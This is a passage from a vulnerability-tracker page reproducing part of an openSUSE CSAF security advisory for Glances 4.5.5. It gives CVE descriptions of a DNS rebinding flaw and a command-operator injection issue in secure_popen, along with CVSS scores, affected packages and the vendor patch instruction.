          "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
          "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
          "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
          "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
          "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2026-46608",
          "url": "https://www.suse.com/security/cve/CVE-2026-46608"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1268855 for CVE-2026-46608",
          "url": "https://bugzilla.suse.com/1268855"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
            "version": "3.1"
          },
          "products": [
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2026-06-25T00:00:00Z",
          "details": "important"
        }
      ],
      "title": "CVE-2026-46608"
    },
    {
      "cve": "CVE-2026-46611",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2026-46611"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s, implemented in glances/server.py) does not validate the HTTP Host header, leaving it vulnerable to DNS rebinding attacks. An attacker can exploit DNS rebinding to exfiltrate the full system monitoring dataset from a victim\u0027s browser. This vulnerability is fixed in 4.5.5.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
          "openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
          "openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
          "openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
          "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
          "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
          "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
          "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
          "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
          "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
          "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
          "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
          "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
          "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
          "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
          "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2026-46611",
          "url": "https://www.suse.com/security/cve/CVE-2026-46611"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1268856 for CVE-2026-46611",
          "url": "https://bugzilla.suse.com/1268856"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          "products": [
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2026-06-25T00:00:00Z",
          "details": "moderate"
        }
      ],
      "title": "CVE-2026-46611"
    },
    {
      "cve": "CVE-2026-53925",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2026-53925"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "Glances is an open-source system cross-platform monitoring tool. From 4.0.8 until 4.5.5, the secure_popen() function in glances/secure.py interprets \u003e (file redirection), | (pipe), and \u0026\u0026 (command chaining) operators in command strings. These operators are applied without any validation on the target file path, piped command, or chained command. When Application Monitoring Process (AMP) modules load their command or service_cmd configuration values from glances.conf, those values are passed directly to secure_popen() with no sanitization. This allows an attacker who can modify the Glances configuration file to write arbitrary content to arbitrary filesystem paths (via \u003e), chain arbitrary commands (via \u0026\u0026), or pipe command output to arbitrary programs (via |). This vulnerability is fixed in 4.5.5.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
          "openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
          "openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
          "openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
          "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
          "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
          "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
          "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
          "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
          "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
          "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
          "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
          "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
          "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
          "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
          "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2026-53925",
          "url": "https://www.suse.com/security/cve/CVE-2026-53925"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1268984 for CVE-2026-53925",
          "url": "https://bugzilla.suse.com/1268984"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
            "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2026-06-25T00:00:00Z",
          "details": "important"
        }
      ],
      "title": "CVE-2026-53925"
    }
  ]
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-53925 (GCVE-0-2026-53925)

FKIE_CVE-2026-53925

GHSA-3VWC-QWHC-3MJ7

Summary

Details

PoC

Impact

Suggested remediation

OPENSUSE-SU-2026:11122-1

Tags

Sightings

Nomenclature